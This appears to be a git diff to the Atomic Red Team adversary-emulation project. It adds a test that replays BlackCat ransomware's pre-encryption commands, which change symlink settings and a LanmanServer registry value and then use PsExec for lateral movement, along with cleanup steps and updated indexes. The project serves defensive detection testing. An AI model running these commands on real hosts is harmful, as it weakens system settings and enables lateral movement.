diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index 80047754..3cacfc48 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -642,6 +642,7 @@ execution,T1059.005,Visual Basic,3,Extract Memory via VBA,8faff437-a114-4547-9a6
 execution,T1569.002,Service Execution,1,Execute a Command as a Service,2382dee2-a75f-49aa-9378-f52df6ed3fb1,command_prompt
 execution,T1569.002,Service Execution,2,Use PsExec to execute a command on a remote host,873106b7-cfed-454b-8680-fa9f6400431c,command_prompt
 execution,T1569.002,Service Execution,3,psexec.py (Impacket),edbcd8c9-3639-4844-afad-455c91e95a35,bash
+execution,T1569.002,Service Execution,4,BlackCat pre-encryption cmds with Lateral Movement,31eb7828-97d7-4067-9c1e-c6feb85edc4b,powershell
 execution,T1053.002,At,1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt
 execution,T1053.002,At,2,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh
 persistence,T1053.005,Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db86-4c2d-b66c-61945aee87c2,command_prompt
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index 8290c874..6d36a56c 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -474,6 +474,7 @@ execution,T1059.005,Visual Basic,2,Encoded VBS code execution,e8209d5f-e42d-45e6
 execution,T1059.005,Visual Basic,3,Extract Memory via VBA,8faff437-a114-4547-9a60-749652a03df6,powershell
 execution,T1569.002,Service Execution,1,Execute a Command as a Service,2382dee2-a75f-49aa-9378-f52df6ed3fb1,command_prompt
 execution,T1569.002,Service Execution,2,Use PsExec to execute a command on a remote host,873106b7-cfed-454b-8680-fa9f6400431c,command_prompt
+execution,T1569.002,Service Execution,4,BlackCat pre-encryption cmds with Lateral Movement,31eb7828-97d7-4067-9c1e-c6feb85edc4b,powershell
 execution,T1053.002,At,1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt
 persistence,T1053.005,Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db86-4c2d-b66c-61945aee87c2,command_prompt
 persistence,T1053.005,Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 98416706..7b8de657 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -1041,6 +1041,7 @@
   - Atomic Test #1: Execute a Command as a Service [windows]
   - Atomic Test #2: Use PsExec to execute a command on a remote host [windows]
   - Atomic Test #3: psexec.py (Impacket) [linux]
+  - Atomic Test #4: BlackCat pre-encryption cmds with Lateral Movement [windows]
 - [T1053.002 At](../../T1053.002/T1053.002.md)
   - Atomic Test #1: At.exe Scheduled task [windows]
   - Atomic Test #2: At - Schedule a job [linux]
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index aa1cd5a0..94c277f7 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -766,6 +766,7 @@
 - [T1569.002 Service Execution](../../T1569.002/T1569.002.md)
   - Atomic Test #1: Execute a Command as a Service [windows]
   - Atomic Test #2: Use PsExec to execute a command on a remote host [windows]
+  - Atomic Test #4: BlackCat pre-encryption cmds with Lateral Movement [windows]
 - [T1053.002 At](../../T1053.002/T1053.002.md)
   - Atomic Test #1: At.exe Scheduled task [windows]
 - T1035 Service Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index cae2ce81..7fdf537a 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -46030,10 +46030,12 @@ execution:
     atomic_tests:
     - name: Execute a Command as a Service
       auto_generated_guid: 2382dee2-a75f-49aa-9378-f52df6ed3fb1
-      description: |
-        Creates a service specifying an arbitrary command and executes it. When executing commands such as PowerShell, the service will report that it did not start correctly even when code executes properly.
-
-        Upon successful execution, cmd.exe creates a new service using sc.exe that will start powershell.exe to create a new file `art-marker.txt`
+      description: "Creates a service specifying an arbitrary command and executes
+        it. When executing commands such as PowerShell, the service will report that
+        it did not start correctly even when code executes properly.\n\nUpon successful
+        execution, cmd.exe creates a new service using sc.exe that will start powershell.exe
+        to create a new file `art-marker.txt`\n\n[BlackCat Ransomware (ALPHV)](https://www.varonis.com/blog/blackcat-ransomware)
+        \ \n[Cybereason vs. BlackCat Ransomware](https://www.cybereason.com/blog/cybereason-vs.-blackcat-ransomware)\n"
       supported_platforms:
       - windows
       input_arguments:
@@ -46148,6 +46150,31 @@ execution:
 
           '
         name: bash
+    - name: BlackCat pre-encryption cmds with Lateral Movement
+      auto_generated_guid: 31eb7828-97d7-4067-9c1e-c6feb85edc4b
+      description: This atomic attempts to emulate the unique behavior of BlackCat
+        ransomware prior to encryption and during Lateral Movement attempts via PsExec
+        on Windows. Uses bundled PsExec like BlackCat
+      supported_platforms:
+      - windows
+      input_arguments:
+        targethost:
+          description: Target hostname to attempt psexec connection to for emulation
+            of lateral movement.
+          type: string
+          default: "$ENV:COMPUTERNAME"
+      executor:
+        command: "cmd.exe /c \"wmic \tcsproduct \tget UUID\" \ncmd.exe /c \"fsutil
+          behavior \tset SymlinkEvaluation R2L:1\" \ncmd.exe /c \"fsutil behavior
+          set \tSymlinkEvaluation R2R:1\"\nreg    add    HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters
+          \   /v MaxMpxCt /d 65535 /t REG_DWORD /f      \ncopy $pathtoatomicsfolder\\T1569.002\\bin\\PsExec.exe
+          $env:temp\ncmd.exe /c \"$env:temp\\psexec.exe  -accepteula  \\\\#{targethost}
+          cmd.exe  /c echo \"--access-token\"\"\n"
+        cleanup_command: "reg delete HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters
+          /v MaxMpxCt /f\ncmd.exe /c \"fsutil behavior set SymlinkEvaluation R2L:0\"
+          \ncmd.exe /c \"fsutil behavior set SymlinkEvaluation R2R:0\"\nrm $env:temp\\psexec.exe\n"
+        name: powershell
+        elevation_required: true
   T1053.002:
     technique:
       x_mitre_platforms:
diff --git a/atomics/T1569.002/T1569.002.md b/atomics/T1569.002/T1569.002.md
index e4e97bb8..a76cb3ce 100644
--- a/atomics/T1569.002/T1569.002.md
+++ b/atomics/T1569.002/T1569.002.md
@@ -14,6 +14,8 @@ Adversaries may leverage these mechanisms to execute malicious content. This can
 
 - [Atomic Test #3 - psexec.py (Impacket)](#atomic-test-3---psexecpy-impacket)
 
+- [Atomic Test #4 - BlackCat pre-encryption cmds with Lateral Movement](#atomic-test-4---blackcat-pre-encryption-cmds-with-lateral-movement)
+
 
 <br/>
 
@@ -22,6 +24,9 @@ Creates a service specifying an arbitrary command and executes it. When executin
 
 Upon successful execution, cmd.exe creates a new service using sc.exe that will start powershell.exe to create a new file `art-marker.txt`
 
+[BlackCat Ransomware (ALPHV)](https://www.varonis.com/blog/blackcat-ransomware)  
+[Cybereason vs. BlackCat Ransomware](https://www.cybereason.com/blog/cybereason-vs.-blackcat-ransomware)
+
 **Supported Platforms:** Windows
 
 
@@ -159,4 +164,49 @@ sudo pip3 install impacket
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #4 - BlackCat pre-encryption cmds with Lateral Movement
+This atomic attempts to emulate the unique behavior of BlackCat ransomware prior to encryption and during Lateral Movement attempts via PsExec on Windows. Uses bundled PsExec like BlackCat
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 31eb7828-97d7-4067-9c1e-c6feb85edc4b
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| targethost | Target hostname to attempt psexec connection to for emulation of lateral movement. | string | $ENV:COMPUTERNAME|
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+cmd.exe /c "wmic 	csproduct 	get UUID" 
+cmd.exe /c "fsutil behavior 	set SymlinkEvaluation R2L:1" 
+cmd.exe /c "fsutil behavior set 	SymlinkEvaluation R2R:1"
+reg    add    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters    /v MaxMpxCt /d 65535 /t REG_DWORD /f      
+copy $pathtoatomicsfolder\T1569.002\bin\PsExec.exe $env:temp
+cmd.exe /c "$env:temp\psexec.exe  -accepteula  \\#{targethost} cmd.exe  /c echo "--access-token""
+```
+
+#### Cleanup Commands:
+```powershell
+reg delete HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters /v MaxMpxCt /f
+cmd.exe /c "fsutil behavior set SymlinkEvaluation R2L:0" 
+cmd.exe /c "fsutil behavior set SymlinkEvaluation R2R:0"
+rm $env:temp\psexec.exe
+```
+
+
+
+
+
 <br/>